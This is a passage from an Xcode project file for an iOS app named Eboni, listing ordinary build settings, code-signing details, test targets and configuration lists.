				185292D7253D53E5006EB82D /* EboniUITests.swift in Sources */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXSourcesBuildPhase section */

/* Begin PBXTargetDependency section */
		185292C9253D53E5006EB82D /* PBXTargetDependency */ = {
			isa = PBXTargetDependency;
			target = 185292B0253D53E1006EB82D /* Eboni */;
			targetProxy = 185292C8253D53E5006EB82D /* PBXContainerItemProxy */;
		};
		185292D4253D53E5006EB82D /* PBXTargetDependency */ = {
			isa = PBXTargetDependency;
			target = 185292B0253D53E1006EB82D /* Eboni */;
			targetProxy = 185292D3253D53E5006EB82D /* PBXContainerItemProxy */;
		};
/* End PBXTargetDependency section */

/* Begin PBXVariantGroup section */
		185292BA253D53E1006EB82D /* Main.storyboard */ = {
			isa = PBXVariantGroup;
			children = (
				185292BB253D53E1006EB82D /* Base */,
			);
			name = Main.storyboard;
			sourceTree = "<group>";
		};
		185292BF253D53E5006EB82D /* LaunchScreen.storyboard */ = {
			isa = PBXVariantGroup;
			children = (
				185292C0253D53E5006EB82D /* Base */,
			);
			name = LaunchScreen.storyboard;
			sourceTree = "<group>";
		};
/* End PBXVariantGroup section */

/* Begin XCBuildConfiguration section */
		185292D9253D53E5006EB82D /* Debug */ = {
			isa = XCBuildConfiguration;
			buildSettings = {
				ALWAYS_SEARCH_USER_PATHS = NO;
				CLANG_ANALYZER_NONNULL = YES;
				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
				CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
				CLANG_CXX_LIBRARY = "libc++";
				CLANG_ENABLE_MODULES = YES;
				CLANG_ENABLE_OBJC_ARC = YES;
				CLANG_ENABLE_OBJC_WEAK = YES;
				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
				CLANG_WARN_BOOL_CONVERSION = YES;
				CLANG_WARN_COMMA = YES;
				CLANG_WARN_CONSTANT_CONVERSION = YES;
				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
				CLANG_WARN_EMPTY_BODY = YES;
				CLANG_WARN_ENUM_CONVERSION = YES;
				CLANG_WARN_INFINITE_RECURSION = YES;
				CLANG_WARN_INT_CONVERSION = YES;
				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
				CLANG_WARN_STRICT_PROTOTYPES = YES;
				CLANG_WARN_SUSPICIOUS_MOVE = YES;
				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
				CLANG_WARN_UNREACHABLE_CODE = YES;
				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
				COPY_PHASE_STRIP = NO;
				DEBUG_INFORMATION_FORMAT = dwarf;
				ENABLE_STRICT_OBJC_MSGSEND = YES;
				ENABLE_TESTABILITY = YES;
				GCC_C_LANGUAGE_STANDARD = gnu11;
				GCC_DYNAMIC_NO_PIC = NO;
				GCC_NO_COMMON_BLOCKS = YES;
				GCC_OPTIMIZATION_LEVEL = 0;
				GCC_PREPROCESSOR_DEFINITIONS = (
					"DEBUG=1",
					"$(inherited)",
				);
				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
				GCC_WARN_UNDECLARED_SELECTOR = YES;
				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
				GCC_WARN_UNUSED_FUNCTION = YES;
				GCC_WARN_UNUSED_VARIABLE = YES;
				IPHONEOS_DEPLOYMENT_TARGET = 13.2;
				MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE;
				MTL_FAST_MATH = YES;
				ONLY_ACTIVE_ARCH = YES;
				SDKROOT = iphoneos;
				SWIFT_ACTIVE_COMPILATION_CONDITIONS = DEBUG;
				SWIFT_OPTIMIZATION_LEVEL = "-Onone";
			};
			name = Debug;
		};
		185292DA253D53E5006EB82D /* Release */ = {
			isa = XCBuildConfiguration;
			buildSettings = {
				ALWAYS_SEARCH_USER_PATHS = NO;
				CLANG_ANALYZER_NONNULL = YES;
				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
				CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
				CLANG_CXX_LIBRARY = "libc++";
				CLANG_ENABLE_MODULES = YES;
				CLANG_ENABLE_OBJC_ARC = YES;
				CLANG_ENABLE_OBJC_WEAK = YES;
				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
				CLANG_WARN_BOOL_CONVERSION = YES;
				CLANG_WARN_COMMA = YES;
				CLANG_WARN_CONSTANT_CONVERSION = YES;
				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
				CLANG_WARN_EMPTY_BODY = YES;
				CLANG_WARN_ENUM_CONVERSION = YES;
				CLANG_WARN_INFINITE_RECURSION = YES;
				CLANG_WARN_INT_CONVERSION = YES;
				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
				CLANG_WARN_STRICT_PROTOTYPES = YES;
				CLANG_WARN_SUSPICIOUS_MOVE = YES;
				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
				CLANG_WARN_UNREACHABLE_CODE = YES;
				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
				COPY_PHASE_STRIP = NO;
				DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym";
				ENABLE_NS_ASSERTIONS = NO;
				ENABLE_STRICT_OBJC_MSGSEND = YES;
				GCC_C_LANGUAGE_STANDARD = gnu11;
				GCC_NO_COMMON_BLOCKS = YES;
				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
				GCC_WARN_UNDECLARED_SELECTOR = YES;
				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
				GCC_WARN_UNUSED_FUNCTION = YES;
				GCC_WARN_UNUSED_VARIABLE = YES;
				IPHONEOS_DEPLOYMENT_TARGET = 13.2;
				MTL_ENABLE_DEBUG_INFO = NO;
				MTL_FAST_MATH = YES;
				SDKROOT = iphoneos;
				SWIFT_COMPILATION_MODE = wholemodule;
				SWIFT_OPTIMIZATION_LEVEL = "-O";
				VALIDATE_PRODUCT = YES;
			};
			name = Release;
		};
		185292DC253D53E5006EB82D /* Debug */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 67FABFC94C1C5C6912A17BE4 /* Pods-Eboni.debug.xcconfig */;
			buildSettings = {
				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
				CLANG_ENABLE_MODULES = YES;
				CODE_SIGN_ENTITLEMENTS = Eboni/Eboni.entitlements;
				CODE_SIGN_IDENTITY = "iPhone Distribution";
				CODE_SIGN_STYLE = Manual;
				CURRENT_PROJECT_VERSION = 4;
				DEVELOPMENT_TEAM = M9YBN5MB78;
				FRAMEWORK_SEARCH_PATHS = (
					"$(inherited)",
					"$(PROJECT_DIR)/Eboni",
				);
				INFOPLIST_FILE = Eboni/Info.plist;
				IPHONEOS_DEPLOYMENT_TARGET = 13.2;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
				);
				MARKETING_VERSION = 1.0.8;
				PRODUCT_BUNDLE_IDENTIFIER = com.Eboni.ios;
				PRODUCT_NAME = Hayti;
				PROVISIONING_PROFILE_SPECIFIER = HaytiDistCert;
				SWIFT_OBJC_BRIDGING_HEADER = "Eboni/Eboni-Bridging-Header.h";
				SWIFT_OPTIMIZATION_LEVEL = "-Onone";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
			};
			name = Debug;
		};
		185292DD253D53E5006EB82D /* Release */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 76DDA9A0F6EAA2110B074662 /* Pods-Eboni.release.xcconfig */;
			buildSettings = {
				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
				CLANG_ENABLE_MODULES = YES;
				CODE_SIGN_ENTITLEMENTS = Eboni/Eboni.entitlements;
				CODE_SIGN_IDENTITY = "iPhone Distribution";
				CODE_SIGN_STYLE = Manual;
				CURRENT_PROJECT_VERSION = 4;
				DEVELOPMENT_TEAM = M9YBN5MB78;
				FRAMEWORK_SEARCH_PATHS = (
					"$(inherited)",
					"$(PROJECT_DIR)/Eboni",
				);
				INFOPLIST_FILE = Eboni/Info.plist;
				IPHONEOS_DEPLOYMENT_TARGET = 13.2;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
				);
				MARKETING_VERSION = 1.0.8;
				PRODUCT_BUNDLE_IDENTIFIER = com.Eboni.ios;
				PRODUCT_NAME = Hayti;
				PROVISIONING_PROFILE_SPECIFIER = HaytiDistCert;
				SWIFT_OBJC_BRIDGING_HEADER = "Eboni/Eboni-Bridging-Header.h";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
			};
			name = Release;
		};
		185292DF253D53E5006EB82D /* Debug */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 188B9A42D9DC1965972F53E1 /* Pods-EboniTests.debug.xcconfig */;
			buildSettings = {
				ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
				BUNDLE_LOADER = "$(TEST_HOST)";
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = EboniTests/Info.plist;
				IPHONEOS_DEPLOYMENT_TARGET = 13.2;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
					"@loader_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = com.EboniTests;
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
				TEST_HOST = "$(BUILT_PRODUCTS_DIR)/Eboni.app/Eboni";
			};
			name = Debug;
		};
		185292E0253D53E5006EB82D /* Release */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 1D540FA665BB677A750F7829 /* Pods-EboniTests.release.xcconfig */;
			buildSettings = {
				ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
				BUNDLE_LOADER = "$(TEST_HOST)";
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = EboniTests/Info.plist;
				IPHONEOS_DEPLOYMENT_TARGET = 13.2;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
					"@loader_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = com.EboniTests;
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
				TEST_HOST = "$(BUILT_PRODUCTS_DIR)/Eboni.app/Eboni";
			};
			name = Release;
		};
		185292E2253D53E5006EB82D /* Debug */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 31801D6A3CB5070446DA53C7 /* Pods-Eboni-EboniUITests.debug.xcconfig */;
			buildSettings = {
				ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = EboniUITests/Info.plist;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
					"@loader_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = com.EboniUITests;
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
				TEST_TARGET_NAME = Eboni;
			};
			name = Debug;
		};
		185292E3253D53E5006EB82D /* Release */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 58A4F8E10C963FA11BBFB74C /* Pods-Eboni-EboniUITests.release.xcconfig */;
			buildSettings = {
				ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = EboniUITests/Info.plist;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
					"@loader_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = com.EboniUITests;
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
				TEST_TARGET_NAME = Eboni;
			};
			name = Release;
		};
/* End XCBuildConfiguration section */

/* Begin XCConfigurationList section */
		185292AC253D53E1006EB82D /* Build configuration list for PBXProject "EBONi" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				185292D9253D53E5006EB82D /* Debug */,
				185292DA253D53E5006EB82D /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
		185292DB253D53E5006EB82D /* Build configuration list for PBXNativeTarget "Eboni" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				185292DC253D53E5006EB82D /* Debug */,
				185292DD253D53E5006EB82D /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
		185292DE253D53E5006EB82D /* Build configuration list for PBXNativeTarget "EboniTests" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				185292DF253D53E5006EB82D /* Debug */,
				185292E0253D53E5006EB82D /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
		185292E1253D53E5006EB82D /* Build configuration list for PBXNativeTarget "EboniUITests" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				185292E2253D53E5006EB82D /* Debug */,
				185292E3253D53E5006EB82D /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
/* End XCConfigurationList section */
	};
	rootObject = 185292A9253D53E1006EB82D /* Project object */;
}
